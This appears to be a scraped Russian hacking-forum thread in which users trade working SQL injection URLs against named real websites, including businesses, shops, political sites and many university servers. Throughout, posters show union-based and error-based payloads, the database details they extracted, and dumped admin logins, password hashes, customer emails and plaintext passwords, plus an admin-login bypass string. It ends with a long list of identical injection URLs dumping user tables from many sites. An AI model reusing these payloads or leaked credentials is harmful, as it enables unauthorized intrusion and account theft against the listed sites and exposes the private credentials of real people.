http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=D643'+or+1=(SELECT+TOP+1+COLUMN_NAME +FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME= 'plyrbioHTML'AND+COLUMN_NAME+NOT+IN+('plyrnum','la stupdate','updateind','biotext'))--
находим нужный столец выводим напр plyrnum

http://www.atptennis.com/3/en/players/playerprofiles/?playernumber=1'+or+1=(SELECT+TOP+1+plyrnum+FROM+p lyrbioHTML)--
получаем 'A001'
Куму нужно ишите админку просто честно лень было :D

P.s там же в строке поиска фотографий Иньекция через POST параметр коу как удобней :)

microstar.ru :)

http://www.microstar.ru/program/support/download/dld/spt_dld_detail.php?UID=459888+union+select+concat( version(),0x3a,user(),0x3a,database()),2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18&kind=10
version() 5.0.37-log
user() microsta@localhost
database() msi
http://www.microstar.ru/program/support/download/dld/spt_dld_detail.php?UID=459888+union+select+concat( user,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18+from+users
Выбираете какая именно из админок вам нужна)
http://microstar.ru/ssl/

к MSI WWW Admin admin:vscegths

dailygrill.com
http://www.dailygrill.com/details.php?loid=999+union+select+1,2,3,4,5,6,7,8, 9,10,concat(version(),0x3a,user(),0x3a,database()) ,12,13,14,15,16,17,18/*
version() 4.1.20
user() dailgrill@localhost
database() dailygrill

www.cameco.com
http://www.cameco.com/corporate_gov/board/directors/bio.php?diid=9999+union+select+1,2,3,concat(versio n(),0x3a,user(),0x3a,database()),5,6,7
version() 4.0.24-log
user() webuser@localhost
database() cameco
http://www.cameco.com/corporate_gov/board/directors/bio.php?diid=9999+union+select+1,2,3,concat(user,0 x3a,password),5,6,7+from+mysql.user
root:38d08178573a7e9a
webuser:
ripple:094af26d30f261b0
twc:6657738010cb81dd
riona_ca:63c907421a792a43
http://www.cameco.com/corporate_gov/board/directors/bio.php?diid=9999+union+select+1,2,3,concat(user_n ame,0x3a,user_password),5,6,7+from+users+limit+0,1
admin:1112ff600dee3a15 - chicago

http://fantasiasexshop.com.br/verSensualidade.php?id=99999'+union+select+1,2,VER SION(),4,5/*
VERSION: 5.0.41--log
USER: fantasiasexshop1@200.234.200.106
DATABASE: fantasiasexshop1

http://www.williamtopley.com/shop/showitem.php?id=99999+union+select+1,2,VERSION(),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17/*
VERSION: 4.1.22-standard
USER: williamt@localhost
DATABASE: williamt_wtdb

http://www.knitterspalette.com/shopping/knittingbags/index.php?id=99999+union+select+1,2,3,TABLE_NAME,5 ,6,7,8,9,10,11,12,13,14+FROM+INFORMATION_SCHEMA.TA BLES+limit+16,1/*
admin_module
admin_user_levels
admin_user_module
homepage
magazine
users
yarn

http://www.rhd.uz/forum_cont.php?uid=-99999+union+select+1,2,user(),version(),database()/*

USER: atumatu_rhd@217.147.30.68
VERSION: log 5.0.45
DATABASE: atumatu_rhd

www.tourtasmania.com PR4

http://tourtasmania.com/content.php?id=cygnet'+and+1=2+union+select+1,2,3, 4,5,concat_ws(0x3a,database(),version(),user()),7/*
justin_tourtas:4.1.20:justin_ttweb@localhost
стандартных таблиц нет

www.alkamae.com PR3
http://www.alkamae.com/product.php?id=8500000+union+select+1,concat_ws(0x 3a,version(),database(),user()),3,4,5,6,7,8,9,10,1 1,12,13,14,15,6,14,18,19,20,21,22+from+users+limit +0,1/*
5.0.45-community:alkamae_content:alkamae_admin121@localho st
http://www.alkamae.com/product.php?id=8500000+union+select+1,concat_ws(0x 3a,NAME,password,member_level),3,4,5,6,7,8,9,10,11 ,12,13,14,15,6,14,18,19,20,21,22+from+users+limit+ 0,1/*
HEATHER:test:4
но в админку это не канает(

http://www.takayagolfcentre.com/
http://www.takayagolfcentre.com/gallery.php?album=3&image=-4+union+select+11111,concat_ws(0x3a,username,passw ord)+from+users/*
(вывод в src картинки)
http://www.takayagolfcentre.com/admin/
admin:takaya07

avtorinok.ru
(есть в антибояне, но у меня с админскими правами для форума)
http://www.avtorinok.ru/news/news_firms.php?id=-890+union+select+1,2,3,4,5,6,7,8,9/*
http://www.avtorinok.ru/forum/
Andrey:welcome22

je0n
вот только то ифреймы на взломаные сайты ставить не надо что бы античатовцы вирусы хватали

жопс)
http://ldpr.ru/iframe.php?page=bzone_banners&pid=-1+union+select+1,1,3,1,1+from+information_schema.t ables/*&content_id=1

xakep.ru
http://www.xakep.ru/articles/Links/result.asp?tosearch=1=1)+and+(1=1

жопс)
http://ldpr.ru/iframe.php?page=bzone_banners&pid=-1+union+select+1,1,3,1,1+from+information_schema.t ables/*&content_id=1

Я вообще-то аполитичен ,но всё должно быть по чесному: :D

_http://www.yavlinsky.ru/news/index.phtml?id=3520+AND+(version()+like+char(51,46 ,50,51,46,53,52))

версия 3.23.54
уязвим так-же поиск

Извращаться сильно не стал,но никто не скажет ,что ачат против ЛДПР :D

Плаватели Онтарио =)
www.swimontario.com

http://www.swimontario.com/news.php?id=15+union+select+1,2,3,4,5,6,7,8,concat _ws(char(58),user
(),version(),database())/*
1. swimont_cardoso@localhost:
2. 4.1.22-standard:
3. swimont_db

Не смог больше ничего подобрать... хнык =(

www.stroyprice.com PR4;ТИЦ950
http://stroyprice.com/kom_one.php?i=541000000+UNION+SELECT+1,concat_ws(0 x3a,admin_fullname,admin_pw,admin_email),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42+from+phpads_config+limit+0,1/*
Administrator:5ebe2294ecd0e0f08eab7690d2a6ee69:inf o@stroyprice.com пасс secret

ну еще 3к юзеров с открытыми паролями
http://stroyprice.com/kom_one.php?i=541000000+UNION+SELECT+1,concat_ws(0 x3a,usr_name,usr_mail,usr_pwd),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+s tr_tbl_usr+limit+0,1/*
kolya:grischenko@zap.kiev.ua:Lord21

http://www.chameleondeal.com/coupons/category.asp?ID=1%20or%201=(SELECT+TOP+1+cast(id+a s+nvarchar)%2B%27%3A%27%2Bcast(FName+as+nvarchar)% 2B%27%3A%27%2Bcast(MName+as+nvarchar)%2B%27%3A%27% 2Bcast(LName+as+nvarchar)%2B%27%3A%27%2Bcast(Email +as+nvarchar)%2B%27%3A%27%2Bcast(StreetAddress+as+ nvarchar)%2B%27%3A%27%2Bcast(City+as+nvarchar)%2B% 27%3A%27%2Bcast(State+as+nvarchar)%2B%27%3A%27%2Bc ast(Zip+as+nvarchar)%2B%27%3A%27%2Bcast(HomePhone+ as+nvarchar)%2B%27%3A%27%2Bcast(WorkPhone+as+nvarc har)%2B%27%3A%27%2Bcast(Cell+as+nvarchar)%2B%27%3A %27%2Bcast(Pager+as+nvarchar)%2B%27%3A%27%2Bcast(F ax+as+nvarchar)%2B%27%3A%27%2Bcast(UserName+as+nva rchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar)%2B %27%3A%27%2Bcast(DateEntered+as+nvarchar)%2B%27%3A %27%2Bcast(DateModified+as+nvarchar)+from+Staff)--

http://www.chameleondeal.com/coupons/category.asp?ID=1%20or%201=(SELECT+TOP+1+TABLE_NAM E+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+ NOT+IN+('Coupons','Categories','deal','Deals','dtp roperties','News','Oshkosh_west','Retailers','Staf f','sysconstraints','syssegments','t_jiaozhu'))--
+ в админке ' or 1=1--

http://www.itelltd.kiev.ua/index.php?page=equipment&id=111&man_id=0x27%20union+select+1,LOAD_FILE(0x2f6574632 f706173737764),LOAD_FILE(0x2f6574632f706173737764) ,4,5,6,7,8,9+from+news/*


ни чего не получается ни кто не скажет ПОЧЕМУ?

Ну раз не работает Load_file, то логично предположить, что нет соответствующих прав, не так ли?

http://hardmoney.pro/lending/lending.php?ID=99999+union+select+1,2,3,VERSION(), 5,6,7,8,9,10,11,12,13,14,15,16/*
VERSEON: 4.1.21-community-nt
USER: ksifunding@69.24.64.101
DATABASE: ksifunding

http://www.global-money.com/item.php?id=99999'+union+select+1,2,VERSION(),4,5, 6,7,8,9,10,11,12,13,14,15,16,17/*
VERSEON: 4.0.26
USER: globalmo@global-money.com
DATABASE: global_money_com_dev

http://freedocumentaries.org/film.php?id=-98+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18+user*

Лень подбирать вапще(. Когда пытаюсь выполнить запрос
http://freedocumentaries.org/film.php?id=-98+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18/*, то пишет мол в запросе другое количество столбцов:РР. или я отупел от столь длительного бездействия, или...или... пора на покой:Р.Встречал на многих сайтах и не раз входил в столько своеобразный тупняк =___=

Движок Интернет магазина :)
http://www.vcam.ru/index.php?id=-1+union+select+user()/*
user: vcam_vcam@localhost
version : 4.1.22-standard
database : vcam_shop



http://www.combox.ru/index.php?id=3+union+select+1,2/*
user : combox_combox@localhost
database : combox_site
version : 4.1.22-standard

Это кстати, главная страница хостинга, и разработчика магазина. Как видите, уязвимость здесь тоже есть :o



http://www.ventorg.ru/divisions.php?id=-1+union+select+1,2,3,4/*
user : ventorg_torg@localhost
database : ventorg_shop
version : 4.1.22-standard

http://www.vcam.ru

http://www.ventorg.ru

Боян, блин создали и обновили же АНТИБОЯН вот ТУТ (http://filefront.jino-net.ru/sql.html)

Так вот вообщем скину вам скули что насоберал в едушках. Собственно это те едухи что не смог похенкать либо впадлу брутить имена таблиц во всех 4ых ветках.

apps.sais-jhu.edu
http://apps.sais-jhu.edu/faculty_bios/faculty_bio1.php?ID=-67 UNION SELECT 1,2,3,4,5,CONCAT_WS(0x203A20,USER(),VERSION(),DATA BASE()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24/*
saisforu_gjbarru@localhost : 4.1.22-standard : saisforu_faculty

biomedical.rutgers.edu
http://biomedical.rutgers.edu/faculty.php?id=-7 UNION SELECT 1,2,3,4,5,CONCAT_WS(0x203A20,USER(),VERSION(),DATA BASE()),7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
bme@coewww.rutgers.edu : 4.1.21 : bme

blogsforlearning.msu.edu
http://blogsforlearning.msu.edu/articles/view.php?id=-7 UNION SELECT 1,2,3,UNHEX(HEX(CONCAT_WS(0x203A20,VERSION(),USER( ),DATABASE()))),5,6,7,8,9/*
4.1.13a-log : blogsforlearning@tempcas.cas.msu.edu : blogsforlearning

dma.ucla.edu
http://dma.ucla.edu/people/faculty.php?ID=-9%20UNION%20SELECT%201,2,CONCAT_WS(0x203A20,USER() ,VERSION(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14, 15,16/*
dma@constitution.design.ucla.edu : 4.1.20 : dma

duckhenge.uoregon.edu
http://duckhenge.uoregon.edu/io/article.php?id=-766 UNION SELECT 1,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()), 3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
5.0.32-Debian_7etch1-log : io@localhost : io

experts.uchicago.edu
http://experts.uchicago.edu/experts.php?id=-174 UNION SELECT 1,2,3,4,CONCAT_WS(0x203A,USER(),VERSION(),DATABASE ()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42/*
www@localhost :4.0.24-standard :newsoffice
FILE_PRIV=Y

journalism.berkeley.edu
http://journalism.berkeley.edu/events/details.php?ID=371 UNION SELECT 1,2,3,4,5,6,7,8,9,CONCAT_WS(0x203A20,VERSION(),USE R(),DATABASE()),11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/*
4.1.22 : jschool@localhost : events

llk.media.mit.edu
http://llk.media.mit.edu/projects.php?id=-783 UNION SELECT 1,2,3,4,CONCAT_WS(0x203A20,VERSION(),USER(),DATABA SE()),6,7,8/*
4.1.20 : llk@www2.media.mit.edu : llk

newmedia.cdws.ucf.edu
http://newmedia.cdws.ucf.edu/pressBoxArticle.php?id=15' AND 1=0 UNION SELECT 1,CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE()), 3,4,5/*
newmediawww@localhost : 5.0.24a-community-nt : newmediawww
PS там wordpress но там хрень какаято

qt.exploratorium.edu
http://qt.exploratorium.edu/cils/resourcelist.php?categoryID=-287 UNION SELECT UNHEX(HEX(CONCAT_WS(0x203A20,USER(),VERSION(),DATA BASE())))/*
resource_centers@qt.exploratorium.edu : 4.1.15-log : resource_centers

urology.jhu.edu
http://urology.jhu.edu/about/faculty.php?id=59' AND 1=0 UNION SELECT 1,2,3,4,5,6,7,8,CONCAT_WS(0x203A20,VERSION(),USER( ),DATABASE()),10,11,12,13,14,15,16,17,18,19,20,21, 22,23/*
4.1.20 : users@localhost : WEB

www.agi.harvard.edu
http://www.agi.harvard.edu/events/download.php?id=-94 UNION SELECT 1,CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()), 3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
4.1.20-log : agi@socrates.harvard.edu : agi

www.choices.edu
http://www.choices.edu/resources/detail.php?id=-26 UNION SELECT 1,UNHEX(HEX(CONCAT_WS(0x203A20,USER(),VERSION(),DA TABASE()))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26/*
choices@charlie.services.brown.edu : 4.1.14-log : Choices

www.ee.virginia.edu
http://www.ee.virginia.edu/profile.php?ID=-8 union select 1,2,3,4,5,6,7,CONCAT_WS(0x203A20,USER(),VERSION(), DATABASE()),9,10,11,12,13,14,15,16,17,18,19,20,21/*
php@localhost : 4.1.20 : ECEWeb

www.eng.wayne.edu
http://www.eng.wayne.edu/page.php?id=-1505 UNION SELECT 1,2,3,4,5,6,7,8,UNHEX(HEX(CONCAT_WS(0x203A20,USER( ),VERSION(),DATABASE()))),10,11,12/*
coeweb@localhost : 4.1.13-standard-log : coeweb
FILE_PRIV=Y

www.psych.ucla.edu
http://www.psych.ucla.edu/Faculty/faculty.php?area=3&id=47 AND 1=0 UNION SELECT 1,2,CONCAT_WS(0x203A20,USER(),VERSION(),DATABASE() ),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
psychweb@phoenix.lifesci.ucla.edu : 4.0.15 : psychadmin


Ну и для супер извращенцев 3 ветки мускуля:
http://wagner.nyu.edu/news/newsStory.php?id=525 AND 3=SUBSTRING(VERSION(),1,1)/*
http://ux.brookdalecc.edu/content.php?ID=114 AND 3=SUBSTRING(VERSION(),1,1)/*
http://bti.cornell.edu/pgrp/pgrp.php?id=602' AND 3=SUBSTRING(VERSION(),1,1)/*

http://www.signs.pl/article.php?sid=-1+union+select+1,2,3,version(),5,6,7,8,9,10+from+u sers/*
PR: 5
5.1.19-beta

Эх, тоже когдато на сеате ездил

http://www.seat.gr/news/news.php?id=-1+UNION+SELECT+1,version(),3,4,5/*
PR: 6
4.0.27

http://www.krosno24.pl/informacje.php3?id=-1+union+select+1,2,3,4,5,6,version(),8,9/*
PR: 4
4.0.26

http://www.rtp.org/main/index.php?pid=-1+UNION+SELECT+1,2,version()/*
PR: 6
5.0.22

http://www.cnts.ru/price.dhtml?cid=-1+union+select+1,version(),3,4/*
http://www.cnts.ru/price.dhtml?cid=-1+union+select+1,password,login,4+from+users/*
http://www.cnts.ru/price.dhtml?cid=-1+union+select+1,concat(login,char(58),password),3 ,4+from+users/*
PR: 3
4.1.21-log


http://www.ochenk.com/entry.php?id=-1+union+select+1,2,3,version()/*
PR: 6
4.1.22-standard

2 Sleep

ВСЕ БОЯНЫ и не по одному разу!!!!!!

eutrainingsite.com

_http://forum.antichat.ru/showpost.php?p=577638&postcount=4681
_http://forum.antichat.ru/showpost.php?p=433407&postcount=2863

kino.ru

_http://forum.antichat.ru/showpost.php?p=572859&postcount=4635
_http://forum.antichat.ru/printthread.php?t=21336&page=116&pp=40
_http://forum.antichat.ru/showpost.php?p=315548&postcount=1216

eipcprograms.com

_http://forum.antichat.ru/showpost.php?p=616782&postcount=5131 -2 страницы назад
_http://forum.antichat.ru/showpost.php?p=594249&postcount=981

Блин какой смысл в антибояне?????
Зачем текст в первом посте???
Это конечно не моё дело,но давайте уважать друг друга в ветке и так >500 страниц

http://www.maxkids.pl/?id_p=0+UNION+SELECT+1,2,3,4,5,6,7,8/*
http://www.maxkids.pl/?id_p=0+UNION+SELECT+version(),2,3,4,5,6,7,8/*
http://www.maxkids.pl/?id_p=0+UNION+SELECT+login,2,3,4,5,6,pass,8+from+u ser/*
PR: 4
4.0.22

http://www.badorgood.com/detail.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9/*
PR: 5
5.0.45-community-log


Германия Авто - официальный дилер Volkswagen (Фольксваген) в Рязани
http://www.germania-auto.ru/cars/?type=0&id=-1+union+select+1,version(),3,4,5,6,7/*
5.0.24-standard

http://www.eifeltour.de/index.php?type=subitem&item=uebernachtung&id=-1+union+select+version(),2/*
PR: 4
5.0.26

Сайт какой то школы
http://www.cvsd.org/admin

в поле username: вводим
1' or 1=1--
и попадаем в админку

ЗЫ я думал эта бага уже в прошлом... :)

фаг.. уже прикрыли.

Кто хочет сорвать джек пот? четверка, таблы не брутил

http://www.epokerindex.com/poker_room_review_blank.php?roomId=-55+union+select+concat(version(),0x3a,user(),0x3a, database())/*

инфо

Warning: SQL: SELECT * FROM pDefaultRoomReview WHERE networkId = 4.1.11-Debian_4sarge7:db12688@10.1.3.19:db12688_epokerind ex LIMIT 1 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.11-Debian_4sarge7:db12688@10.1.3.19:db12688_epokerind ex LIMIT 1' at line 6 in /home/12688/domains/epokerindex.com/html/obj/obj_SQL.php on line 28

Сорри,Сории,Сорри

http://www.columnists.com/index.php?ID=-11+union+select+1,2,3,4,5,6,table_name,8+from+info rmation_schema.tables/*
http://www.eipcscreensavers.com/product.php?id=-11+union+select+1,version(),user(),4,5,6,7,databas e(),9,0,1,2,3/*
http://www.yogacenter.ru/page.php?id=-11+union+select+table_name,2,3,4,5+from+informatio n_schema.tables/*http://www.poweringmuscles.com/sports_science.php?id=-11+union+select+version()/* http://jazz.koktebel.info/participant.php?id=-11'+union+select+1,2,3,4,5,6,version(),user()/*

Еще одно казино ,кто выиграет не забудте про меня :D

_http://www.cardwolves.com/pokerlist.php?room=-7+union+select+1,concat_ws(0x3a,User(),Database(), Version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25/*

praetor_access@localhost:praetor_cardwolves:5.0.27

Часть таблиц:

_http://www.cardwolves.com/pokerlist.php?room=-7+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25+from+infor mation_schema.tables+limit+16,1/*

abuse
admin_rights
admin_users

Таблица admin_users:

_http://www.cardwolves.com/pokerlist.php?room=-7+union+select+1,column_name,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25+from+info rmation_schema.columns+where+table_name=0x61646d69 6e5f7573657273+limit+0,1/*

user_id
user_active
user_name
user_email
user_password

И хеш суперадмина:D

_http://www.cardwolves.com/pokerlist.php?room=-7+union+select+1,concat(user_name,0x3a,user_passwo rd,0x3a,user_email),3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25+from+admin_users+l imit+0,1/*

superadmin:325c3ec0b351a639068d2fb913919bde:admin@ cardwolves.com

xcedz вдохновил(хотел репы добавить-не даёт)

всем привет
http://www.goldsys.com/index.php?load=content&page_id=-23+union+select+1,2,user(),version(),database(),6, 7/*
gold@localhost
goldDB
4.1.20

_http://handbook.ecu.edu.au/CourseStructure.asp?disyear=2008+and+1=1--&CID=1&USID=0&UCID=0&UID=0&Ver=0&HB=HB&SC

Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "2008 and 1=1--"]'

/CourseStructure.asp, line 2025
2008 and 1=1-- ON-LINE HANDBOOK

http://www.brightstar.com.tw/product_info_e.php?UID=-772'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,concat_ws(0x3A3a,name,pwd),20,21,22,2 3,24,25,26,27,28,29,30,31,32,33+from+admin/*

�B���::*FEEF1A11AAEC0B57C55019116A56ACFA47B2 8417
���� ::*0DCC24D4F0A18E3B84417DC07EB08AEF1BE008E2

http://www.belanovsky.ru/links/ind.php?id_typ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,cust omerID,Login,cust_password,Email,first_name,last_n ame,subscribed4news,custgroupID,addressID,reg_date time,ActivationCode,CID),8,9,10,11,12,13,14,15+fro m+SS_customers/*

USER: u55631@10.10.223.230:
VERSION: 5.0.45-log:
DATABASE: u55631

1:admin:d2luZG93c21vYmlsZQ==:sassassas@rambler.ru: ::1:0:0:2007-03-01 16:26:01::3

2 ThreeD
Сомневаюсь, что это �B��� можно использовать в качестве логина :D
Вот столбцы из таблицы admin:
UID
DEPARTMENT
DEPARTMENT_UID
ID
PWD
NAME
SEX
MOBILE
EMAIL
PRIVILEGE
LAST_LOGIN
LAST_CHPWD

Я админку не искал,но думаю для авторизации используют не имя на японском :D

Чтоб в тему:
http://www.attcottonbowl.com/news_room/releases.php?uid=-160'+union+select+1,2,3,4,5,concat_ws(0x3A3a,versi on(),database(),user()),7,8,9,10,11,12,13,14,15,16 +from+user/*

4.1.20::cottonbowl::cottonbowl@localhost

В таблице user поля подобрать не смог (

http://mirfurniture.ru/ind.php?id_typ=0x3127%20union+select+1,2,3,4,5,6,c oncat_ws(0x2F,version(),database(),user()),8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23/*
5.0.33-log/dmebel6/root@localhost

http://www.9528033.ru/board/ind.php?id_typ=0x2d3127%20union+select+1,2,3,4,5,6 ,concat_ws(0x2F,version(),database(),user()),8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23/*
4.1.22/www9528033ru/f9528033@localhost

http://neodoska.ru/ind.php?id_categ=0x2d3127%20union+select+1,2,3,4,5 ,6,concat_ws(0x2F,version(),database(),user()),8,9 ,10,11,12,13,14,15,16,17,18,19,20/*
5.0.45-community/angelos_doska/angelos@localhost


Готовые :rolleyes: их там еще тысячи в ГУГЛЕ =)

http://www.ridgecrestdevelopments.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.regencycollege.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.rogerssprayers.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.lifelinebrokers.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.shaughnessyappliance.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.dembytrailer.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.neufeldbuildingmovers.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.kwpetro.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.hubcity150.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.greatwestwarehouse.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.saskatoonbeds.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest12.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.efficiencyheating.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest11.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.imatroncontinental.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.minitune.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.ceresindustries.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.saskatoonbeds.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest3.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.sewandhome.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.numacorptest4.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.lifelinebrokers.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.wildrosegarments.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.efficiencyheating.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.dembytrailer.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.virgorenovation.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.olympicpavingstone.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.firsteditionfirstaid.com/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
http://www.ironmax.ca/index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
